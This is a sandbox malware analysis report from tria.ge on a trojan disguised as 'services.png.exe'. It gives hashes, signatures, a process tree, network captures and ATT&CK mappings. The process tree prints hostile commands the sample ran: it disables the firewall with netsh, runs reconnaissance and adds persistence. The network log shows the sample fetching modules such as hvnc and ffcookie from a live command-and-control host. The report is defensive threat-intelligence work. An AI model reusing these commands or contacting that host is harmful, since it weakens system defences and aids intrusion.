Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

services.png.exe

windows7-x64

8

services.png.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    31/01/2025, 10:03 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    services.png.exe

  • Size

    264KB

  • MD5

    d397a1de162f332782fe3205a07792dd

  • SHA1

    44793b3a374c3cb453bbd87a2fd28d8a4c408002

  • SHA256

    ea251bf7fcc0a42cb9e954a45d925ef379ef1ffca39e482f44af701b4ace8560

  • SHA512

    6be10fc6ebabffadd89a72862c5d292e2939d165298019fe684de4efb3284603756c8764810835c12651ad49f608dd3345c8d778b7fd795683f0fcceeaa3f659

  • SSDEEP

    6144:VtjNiEZdoTD3wad4eq5OxUatA04d0drsFp2A4AG5uU:VTdS3Uek0WchA2D

Score
8/10
defense_evasiondiscoverypersistenceprivilege_escalation

Malware Config

Signatures

  • Modifies Windows Firewall 2 TTPs 1 IoCs
    defense_evasion
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
    discovery
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies system certificate store 2 TTPs 2 IoCs
    defense_evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
      PID:1088
    • C:\Windows\system32\Dwm.exe
      "C:\Windows\system32\Dwm.exe"
      1⤵
        PID:1168
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
          PID:1192
          • C:\Users\Admin\AppData\Local\Temp\services.png.exe
            "C:\Users\Admin\AppData\Local\Temp\services.png.exe"
            2⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2680
            • C:\Users\Admin\AppData\Roaming\Hearirigdibe\ubahwoura.exe
              "C:\Users\Admin\AppData\Roaming\Hearirigdibe\ubahwoura.exe"
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2700
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2040
                • C:\Windows\SysWOW64\HOSTNAME.EXE
                  hostname
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1044
                • C:\Windows\SysWOW64\ipconfig.exe
                  ipconfig /all
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Gathers network information
                  PID:2876
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  5⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2900
                • C:\Windows\SysWOW64\netsh.exe
                  netsh firewall set opmode disable
                  5⤵
                  • Modifies Windows Firewall
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:112
                • C:\Windows\SysWOW64\net.exe
                  net share
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1736
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 share
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:1868
        • C:\Windows\system32\DllHost.exe
          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
          1⤵
            PID:1440
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
            1⤵
              PID:2556

            Network

            • flag-us
              DNS
              saba.royalreturns.org
              ubahwoura.exe
              Remote address:
              8.8.8.8:53
              Request
              saba.royalreturns.org
              IN A
              Response
              saba.royalreturns.org
              IN A
              212.224.93.93
            • flag-de
              POST
              https://saba.royalreturns.org/file.php
              ubahwoura.exe
              Remote address:
              212.224.93.93:443
              Request
              POST /file.php HTTP/1.1
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
              Host: saba.royalreturns.org
              Content-Length: 142
              Connection: Keep-Alive
              Cache-Control: no-cache
              Response
              HTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 31 Jan 2025 10:03:26 GMT
              Content-Type: application/octet-stream
              Content-Length: 174876
              Connection: keep-alive
              Cache-Control: public
              Content-Disposition: attachment; filename="%2e/files/atmos_video.module"
              Content-Transfer-Encoding: binary
              Strict-Transport-Security: max-age=31536000;
            • flag-de
              POST
              https://saba.royalreturns.org/file.php
              ubahwoura.exe
              Remote address:
              212.224.93.93:443
              Request
              POST /file.php HTTP/1.1
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
              Host: saba.royalreturns.org
              Content-Length: 130
              Connection: Keep-Alive
              Cache-Control: no-cache
              Response
              HTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 31 Jan 2025 10:03:27 GMT
              Content-Type: application/octet-stream
              Content-Length: 14064
              Connection: keep-alive
              Cache-Control: public
              Content-Disposition: attachment; filename="%2e/files/us.xml"
              Content-Transfer-Encoding: binary
              Strict-Transport-Security: max-age=31536000;
            • flag-de
              POST
              https://saba.royalreturns.org/file.php
              ubahwoura.exe
              Remote address:
              212.224.93.93:443
              Request
              POST /file.php HTTP/1.1
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
              Host: saba.royalreturns.org
              Content-Length: 145
              Connection: Keep-Alive
              Cache-Control: no-cache
              Response
              HTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 31 Jan 2025 10:03:27 GMT
              Content-Type: application/octet-stream
              Content-Length: 221468
              Connection: keep-alive
              Cache-Control: public
              Content-Disposition: attachment; filename="%2e/files/atmos_ffcookie.module"
              Content-Transfer-Encoding: binary
              Strict-Transport-Security: max-age=31536000;
            • flag-de
              POST
              https://saba.royalreturns.org/file.php
              ubahwoura.exe
              Remote address:
              212.224.93.93:443
              Request
              POST /file.php HTTP/1.1
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
              Host: saba.royalreturns.org
              Content-Length: 141
              Connection: Keep-Alive
              Cache-Control: no-cache
              Response
              HTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 31 Jan 2025 10:03:27 GMT
              Content-Type: application/octet-stream
              Content-Length: 225052
              Connection: keep-alive
              Cache-Control: public
              Content-Disposition: attachment; filename="%2e/files/atmos_hvnc.module"
              Content-Transfer-Encoding: binary
              Strict-Transport-Security: max-age=31536000;
            • flag-us
              DNS
              www.google.com
              ubahwoura.exe
              Remote address:
              8.8.8.8:53
              Request
              www.google.com
              IN A
              Response
              www.google.com
              IN A
              216.58.213.4
            • flag-gb
              GET
              http://www.google.com/webhp
              ubahwoura.exe
              Remote address:
              216.58.213.4:80
              Request
              GET /webhp HTTP/1.1
              Accept: */*
              Connection: Close
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
              Host: www.google.com
              Cache-Control: no-cache
              Response
              HTTP/1.1 302 Found
              Location: http://www.google.com/sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGIzA8rwGIjD0cNxUVEcL6jSnosSz7v4YEThk48oeXrktazejmPbolcCE6UkyHI7lnGEBQm3PGCkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
              x-hallmonitor-challenge: CgwIjMDyvAYQs6mHtwMSBLXXsFM
              Content-Type: text/html; charset=UTF-8
              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-PfQoX0KsuRhbLyIpar3dQg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
              Date: Fri, 31 Jan 2025 10:03:56 GMT
              Server: gws
              Content-Length: 401
              X-XSS-Protection: 0
              X-Frame-Options: SAMEORIGIN
              Set-Cookie: AEC=AVcja2fRrb1ofdOAl0BBs_SmqCZD9kuFfk_uzu1d8Cbso7tuxcFSq3WPvg; expires=Wed, 30-Jul-2025 10:03:56 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
              Connection: close
            • flag-gb
              GET
              http://www.google.com/sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGIzA8rwGIjD0cNxUVEcL6jSnosSz7v4YEThk48oeXrktazejmPbolcCE6UkyHI7lnGEBQm3PGCkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
              ubahwoura.exe
              Remote address:
              216.58.213.4:80
              Request
              GET /sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGIzA8rwGIjD0cNxUVEcL6jSnosSz7v4YEThk48oeXrktazejmPbolcCE6UkyHI7lnGEBQm3PGCkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
              Host: www.google.com
              Cache-Control: no-cache
              Connection: Close
              Response
              HTTP/1.1 429 Too Many Requests
              Date: Fri, 31 Jan 2025 10:03:56 GMT
              Pragma: no-cache
              Expires: Fri, 01 Jan 1990 00:00:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Content-Type: text/html
              Server: HTTP server (unknown)
              Content-Length: 3090
              X-XSS-Protection: 0
              Connection: close
            • flag-gb
              GET
              http://www.google.com/webhp
              ubahwoura.exe
              Remote address:
              216.58.213.4:80
              Request
              GET /webhp HTTP/1.1
              Accept: */*
              Connection: Close
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
              Host: www.google.com
              Cache-Control: no-cache
              Response
              HTTP/1.1 302 Found
              Location: http://www.google.com/sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGI3A8rwGIjCC1uaxylR74etMVEcjMLXESH01-s7QSPYnm1Y2M8DuX3AfLzWZ970plntqfIYIu_UyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
              x-hallmonitor-challenge: CgwIjcDyvAYQ8tO5uAESBLXXsFM
              Content-Type: text/html; charset=UTF-8
              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-vhISdd4ZbDLt4B2A27s7rA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
              Date: Fri, 31 Jan 2025 10:03:57 GMT
              Server: gws
              Content-Length: 401
              X-XSS-Protection: 0
              X-Frame-Options: SAMEORIGIN
              Set-Cookie: AEC=AVcja2dFBlNdNem3ZinIVzBPoXQLpYzlThiGuvmQwxc-k7rq0_7ql_L7ww; expires=Wed, 30-Jul-2025 10:03:57 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
              Connection: close
            • flag-us
              DNS
              crl.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              crl.microsoft.com
              IN A
              Response
              crl.microsoft.com
              IN CNAME
              crl.www.ms.akadns.net
              crl.www.ms.akadns.net
              IN CNAME
              a1363.dscg.akamai.net
              a1363.dscg.akamai.net
              IN A
              2.19.252.157
              a1363.dscg.akamai.net
              IN A
              2.19.252.143
            • flag-gb
              GET
              http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
              Remote address:
              2.19.252.157:80
              Request
              GET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              If-Modified-Since: Thu, 11 Jul 2024 01:45:51 GMT
              User-Agent: Microsoft-CryptoAPI/6.1
              Host: crl.microsoft.com
              Response
              HTTP/1.1 200 OK
              Content-Length: 1036
              Content-Type: application/octet-stream
              Content-MD5: +oTkvMkqpdtzWrUHEQQM3g==
              Last-Modified: Thu, 12 Dec 2024 00:06:56 GMT
              ETag: 0x8DD1A40E476D877
              Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
              x-ms-request-id: 4de8ec0b-c01e-0047-3936-4c3cb1000000
              x-ms-version: 2009-09-19
              x-ms-lease-status: unlocked
              x-ms-blob-type: BlockBlob
              Date: Fri, 31 Jan 2025 10:03:57 GMT
              Connection: keep-alive
            • flag-us
              DNS
              www.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              www.microsoft.com
              IN A
              Response
              www.microsoft.com
              IN CNAME
              www.microsoft.com-c-3.edgekey.net
              www.microsoft.com-c-3.edgekey.net
              IN CNAME
              www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
              www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
              IN CNAME
              e13678.dscb.akamaiedge.net
              e13678.dscb.akamaiedge.net
              IN A
              95.100.245.144
            • flag-gb
              GET
              http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
              Remote address:
              95.100.245.144:80
              Request
              GET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              If-Modified-Since: Sun, 18 Aug 2024 00:23:49 GMT
              User-Agent: Microsoft-CryptoAPI/6.1
              Host: www.microsoft.com
              Response
              HTTP/1.1 200 OK
              Content-Length: 1078
              Content-Type: application/octet-stream
              Content-MD5: HqJzZuA065RHozzmOcAUiQ==
              Last-Modified: Tue, 14 Jan 2025 20:41:31 GMT
              ETag: 0x8DD34DBD43549F4
              x-ms-request-id: 6a4411aa-c01e-0068-30c9-66317a000000
              x-ms-version: 2009-09-19
              x-ms-lease-status: unlocked
              x-ms-blob-type: BlockBlob
              Date: Fri, 31 Jan 2025 10:03:57 GMT
              Connection: keep-alive
              TLS_version: UNKNOWN
              ms-cv: CASMicrosoftCV1a53f8e5.0
              ms-cv-esi: CASMicrosoftCV1a53f8e5.0
              X-RTag: RT
            • flag-gb
              GET
              http://www.google.com/sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGI3A8rwGIjCC1uaxylR74etMVEcjMLXESH01-s7QSPYnm1Y2M8DuX3AfLzWZ970plntqfIYIu_UyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
              ubahwoura.exe
              Remote address:
              216.58.213.4:80
              Request
              GET /sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGI3A8rwGIjCC1uaxylR74etMVEcjMLXESH01-s7QSPYnm1Y2M8DuX3AfLzWZ970plntqfIYIu_UyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
              Host: www.google.com
              Cache-Control: no-cache
              Connection: Close
              Response
              HTTP/1.1 429 Too Many Requests
              Date: Fri, 31 Jan 2025 10:03:57 GMT
              Pragma: no-cache
              Expires: Fri, 01 Jan 1990 00:00:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Content-Type: text/html
              Server: HTTP server (unknown)
              Content-Length: 3090
              X-XSS-Protection: 0
              Connection: close
            • flag-de
              POST
              https://saba.royalreturns.org/gate.php
              ubahwoura.exe
              Remote address:
              212.224.93.93:443
              Request
              POST /gate.php HTTP/1.1
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
              Host: saba.royalreturns.org
              Content-Length: 440
              Connection: Keep-Alive
              Cache-Control: no-cache
              Response
              HTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 31 Jan 2025 10:03:57 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Vary: Accept-Encoding
              Vary: Accept-Encoding
              Strict-Transport-Security: max-age=31536000;
            • 212.224.93.93:443
              https://saba.royalreturns.org/file.php
              tls, http
              ubahwoura.exe
              4.7kB
               192.8kB
               84
              144

              HTTP Request

              POST https://saba.royalreturns.org/file.php

              HTTP Response

              200
            • 212.224.93.93:443
              https://saba.royalreturns.org/file.php
              tls, http
              ubahwoura.exe
              1.8kB
               20.0kB
               17
              20

              HTTP Request

              POST https://saba.royalreturns.org/file.php

              HTTP Response

              200
            • 212.224.93.93:443
              https://saba.royalreturns.org/file.php
              tls, http
              ubahwoura.exe
              5.3kB
               239.1kB
               97
              182

              HTTP Request

              POST https://saba.royalreturns.org/file.php

              HTTP Response

              200
            • 212.224.93.93:443
              https://saba.royalreturns.org/file.php
              tls, http
              ubahwoura.exe
              5.2kB
               242.8kB
               96
              182

              HTTP Request

              POST https://saba.royalreturns.org/file.php

              HTTP Response

              200
            • 216.58.213.4:80
              http://www.google.com/webhp
              http
              ubahwoura.exe
              536 B
               1.5kB
               5
              5

              HTTP Request

              GET http://www.google.com/webhp

              HTTP Response

              302
            • 216.58.213.4:80
              http://www.google.com/sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGIzA8rwGIjD0cNxUVEcL6jSnosSz7v4YEThk48oeXrktazejmPbolcCE6UkyHI7lnGEBQm3PGCkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
              http
              ubahwoura.exe
              847 B
               3.7kB
               8
              7

              HTTP Request

              GET http://www.google.com/sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGIzA8rwGIjD0cNxUVEcL6jSnosSz7v4YEThk48oeXrktazejmPbolcCE6UkyHI7lnGEBQm3PGCkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

              HTTP Response

              429
            • 216.58.213.4:80
              http://www.google.com/webhp
              http
              ubahwoura.exe
              536 B
               1.5kB
               5
              5

              HTTP Request

              GET http://www.google.com/webhp

              HTTP Response

              302
            • 2.19.252.157:80
              http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
              http
              399 B
               1.7kB
               4
              4

              HTTP Request

              GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

              HTTP Response

              200
            • 95.100.245.144:80
              http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
              http
              393 B
               1.7kB
               4
              4

              HTTP Request

              GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

              HTTP Response

              200
            • 216.58.213.4:80
              http://www.google.com/sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGI3A8rwGIjCC1uaxylR74etMVEcjMLXESH01-s7QSPYnm1Y2M8DuX3AfLzWZ970plntqfIYIu_UyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
              http
              ubahwoura.exe
              847 B
               3.7kB
               8
              7

              HTTP Request

              GET http://www.google.com/sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGI3A8rwGIjCC1uaxylR74etMVEcjMLXESH01-s7QSPYnm1Y2M8DuX3AfLzWZ970plntqfIYIu_UyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

              HTTP Response

              429
            • 212.224.93.93:443
              https://saba.royalreturns.org/gate.php
              tls, http
              ubahwoura.exe
              1.8kB
               1.7kB
               14
              12

              HTTP Request

              POST https://saba.royalreturns.org/gate.php

              HTTP Response

              200
            • 8.8.8.8:53
              saba.royalreturns.org
              dns
              ubahwoura.exe
              67 B
               83 B
               1
              1

              DNS Request

              saba.royalreturns.org

              DNS Response

              212.224.93.93

            • 8.8.8.8:53
              www.google.com
              dns
              ubahwoura.exe
              60 B
               76 B
               1
              1

              DNS Request

              www.google.com

              DNS Response

              216.58.213.4

            • 8.8.8.8:53
              crl.microsoft.com
              dns
              63 B
               162 B
               1
              1

              DNS Request

              crl.microsoft.com

              DNS Response

              2.19.252.157
              2.19.252.143

            • 8.8.8.8:53
              www.microsoft.com
              dns
              63 B
               230 B
               1
              1

              DNS Request

              www.microsoft.com

              DNS Response

              95.100.245.144

            MITRE ATT&CK Enterprise v15

            Reconnaissance

            Resource Development

            Initial Access

            Execution

            Command and Scripting Interpreter

            1
            T1059

            Persistence

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Create or Modify System Process

            1
            T1543

            Windows Service

            1
            T1543.003

            Event Triggered Execution

            1
            T1546

            Netsh Helper DLL

            1
            T1546.007

            Privilege Escalation

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Create or Modify System Process

            1
            T1543

            Windows Service

            1
            T1543.003

            Event Triggered Execution

            1
            T1546

            Netsh Helper DLL

            1
            T1546.007

            Defense Evasion

            Impair Defenses

            1
            T1562

            Disable or Modify System Firewall

            1
            T1562.004

            Modify Registry

            2
            T1112

            Subvert Trust Controls

            1
            T1553

            Install Root Certificate

            1
            T1553.004

            Credential Access

            Discovery

            Network Share Discovery

            1
            T1135

            Process Discovery

            1
            T1057

            System Information Discovery

            1
            T1082

            System Location Discovery

            1
            T1614

            System Language Discovery

            1
            T1614.001

            Lateral Movement

            Collection

            Command and Control

            Exfiltration

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Roaming\Conoraloatge\atkodykiz.eba
              Filesize

              606KB

              MD5

              78f5d59f7b55a7c13a85059afc9f1f07

              SHA1

              b4a9d09e71d09f2d0ce5609cd702560e0b8a53e3

              SHA256

              1c6a6bf6d2d0f5a09f6d22af3e03948619115bcf816636fa2dbcc11d188ff358

              SHA512

              a6639b421d3f7196e27b15b7e8d5aad6ac4098392a7d4906df8b551ef3fc50605c50c855f7b83415b06607e21a53ed186cadd9734536b2bbf486bbde32298c41

              Download Submit

            • \Users\Admin\AppData\Local\Temp\tmp7D5A.tmp
              Filesize

              1.2MB

              MD5

              d124f55b9393c976963407dff51ffa79

              SHA1

              2c7bbedd79791bfb866898c85b504186db610b5d

              SHA256

              ea1e16247c848c8c171c4cd1fa17bc5a018a1fcb0c0dac25009066b6667b8eef

              SHA512

              278fe3a4b1fbbe700e4f4483b610133e975e36e101455661d5197bd892a68839b9d555499040d200c92aefa9e3819380e395c0cd85d5fc845c6364d128a8cf06

              Download Submit

            • \Users\Admin\AppData\Local\Temp\tmp7D7A.tmp
              Filesize

              1.1MB

              MD5

              9b98d47916ead4f69ef51b56b0c2323c

              SHA1

              290a80b4ded0efc0fd00816f373fcea81a521330

              SHA256

              96e0ae104c9662d0d20fdf59844c2d18334e5847b6c4fc7f8ce4b3b87f39887b

              SHA512

              68b67021f228d8d71df4deb0b6388558b2f935a6aa466a12199cd37ada47ee588ea407b278d190d3a498b0ef3f5f1a2573a469b7ea5561ab2e7055c45565fe94

              Download Submit

            • \Users\Admin\AppData\Roaming\Hearirigdibe\ubahwoura.exe
              Filesize

              264KB

              MD5

              8c075d92c320965ac0acf9aef9d87def

              SHA1

              4d4f17a7075890303847a03535e852293bbbd24e

              SHA256

              daaba63cc784e035425b47e0ced975101fcd25646d36e585a893c6b49a69cb76

              SHA512

              2929dcea8492d15457539cc57f43f9306652fd4c90b6e97915a565006447c0167b13f2f2c680d850c9c9b9319a5868b743b6ed1774bd06ec5b17bd8e804b27a1

              Download Submit

            • memory/1088-39-0x0000000000220000-0x0000000000267000-memory.dmp

              Filesize

              284KB

              Download

            • memory/1088-36-0x0000000000220000-0x0000000000267000-memory.dmp

              Filesize

              284KB

              Download

            • memory/1088-34-0x0000000000220000-0x0000000000267000-memory.dmp

              Filesize

              284KB

              Download

            • memory/1088-37-0x0000000000220000-0x0000000000267000-memory.dmp

              Filesize

              284KB

              Download

            • memory/1088-38-0x0000000000220000-0x0000000000267000-memory.dmp

              Filesize

              284KB

              Download

            • memory/1168-48-0x0000000001F90000-0x0000000001FD7000-memory.dmp

              Filesize

              284KB

              Download

            • memory/1168-42-0x0000000001F90000-0x0000000001FD7000-memory.dmp

              Filesize

              284KB

              Download

            • memory/1168-44-0x0000000001F90000-0x0000000001FD7000-memory.dmp

              Filesize

              284KB

              Download

            • memory/1168-46-0x0000000001F90000-0x0000000001FD7000-memory.dmp

              Filesize

              284KB

              Download

            • memory/1192-54-0x0000000002EC0000-0x0000000002F07000-memory.dmp

              Filesize

              284KB

              Download

            • memory/1192-53-0x0000000002EC0000-0x0000000002F07000-memory.dmp

              Filesize

              284KB

              Download

            • memory/1192-51-0x0000000002EC0000-0x0000000002F07000-memory.dmp

              Filesize

              284KB

              Download

            • memory/1192-52-0x0000000002EC0000-0x0000000002F07000-memory.dmp

              Filesize

              284KB

              Download

            • memory/1440-59-0x0000000001ED0000-0x0000000001F17000-memory.dmp

              Filesize

              284KB

              Download

            • memory/1440-61-0x0000000001ED0000-0x0000000001F17000-memory.dmp

              Filesize

              284KB

              Download

            • memory/1440-63-0x0000000001ED0000-0x0000000001F17000-memory.dmp

              Filesize

              284KB

              Download

            • memory/1440-57-0x0000000001ED0000-0x0000000001F17000-memory.dmp

              Filesize

              284KB

              Download

            • memory/2556-105-0x0000000000440000-0x0000000000487000-memory.dmp

              Filesize

              284KB

              Download

            • memory/2556-103-0x0000000000440000-0x0000000000487000-memory.dmp

              Filesize

              284KB

              Download

            • memory/2556-107-0x0000000000440000-0x0000000000487000-memory.dmp

              Filesize

              284KB

              Download

            • memory/2556-109-0x0000000000440000-0x0000000000487000-memory.dmp

              Filesize

              284KB

              Download

            • memory/2680-67-0x00000000024A0000-0x00000000024E7000-memory.dmp

              Filesize

              284KB

              Download

            • memory/2680-71-0x00000000024A0000-0x00000000024E7000-memory.dmp

              Filesize

              284KB

              Download

            • memory/2680-2-0x0000000000270000-0x0000000000271000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2680-4-0x0000000000270000-0x0000000000271000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2680-69-0x00000000024A0000-0x00000000024E7000-memory.dmp

              Filesize

              284KB

              Download

            • memory/2680-0-0x0000000000400000-0x0000000000447000-memory.dmp

              Filesize

              284KB

              Download

            • memory/2680-75-0x00000000024A0000-0x00000000024E7000-memory.dmp

              Filesize

              284KB

              Download

            • memory/2680-73-0x00000000024A0000-0x00000000024E7000-memory.dmp

              Filesize

              284KB

              Download

            • memory/2680-1-0x0000000000400000-0x0000000000447000-memory.dmp

              Filesize

              284KB

              Download

            We care about your privacy.

            This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.